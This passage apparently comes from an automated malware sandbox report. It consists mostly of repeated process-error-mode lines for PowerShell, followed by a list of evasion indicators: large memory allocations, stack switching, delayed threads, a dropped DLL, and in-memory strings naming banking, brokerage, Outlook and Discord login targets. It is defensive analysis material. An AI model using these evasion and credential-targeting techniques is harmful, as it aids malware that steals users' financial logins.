                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Allocates many large memory junks
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F30000 memory commit 500064256Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F31000 memory commit 500154368Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F57000 memory commit 500002816Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F58000 memory commit 500047872Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F63000 memory commit 500015104Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F67000 memory commit 500006912Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeMemory allocated: 2F68000 memory commit 500015104Jump to behavior
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D324
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D7E4
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D944
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D504
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D544
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60D1E4
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B610154
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFC1B60DA44
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4FBD30 rdtscp 11_2_2C4FBD30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7278Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7560Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2056Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 567Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 9405Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 0.8 %
                    Source: C:\Windows\SysWOW64\systeminfo.exeAPI coverage: 3.1 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 3796Thread sleep count: 7278 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 7560 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep count: 2056 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6868Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe TID: 6224Thread sleep time: -40000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exe TID: 3292Thread sleep count: 567 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exe TID: 3292Thread sleep time: -1134000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exe TID: 3292Thread sleep count: 9405 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exe TID: 3292Thread sleep time: -18810000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 1000Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F354D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,6_2_02F354D0
                    Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 14_2_02D5C530 FindFirstFileW,FindNextFileW,FindClose,14_2_02D5C530
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: jy7dhEfPtuBr.exe, 0000000D.00000002.2109533766.00000000009A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\F
                    Source: 61b83Fh.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: 61b83Fh.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: 61b83Fh.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: powershell.exe, 00000003.00000002.1058546726.0000000008923000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1058546726.0000000008978000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1058546726.0000000008991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2113848404.000001BFF0C58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: 61b83Fh.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: 61b83Fh.14.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: powershell.exe, 00000003.00000002.1021362956.0000000005478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: svchost.exe, 0000000F.00000002.2110713427.000001BFEB62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 61b83Fh.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: 61b83Fh.14.drBinary or memory string: discord.comVMware20,11696492231f
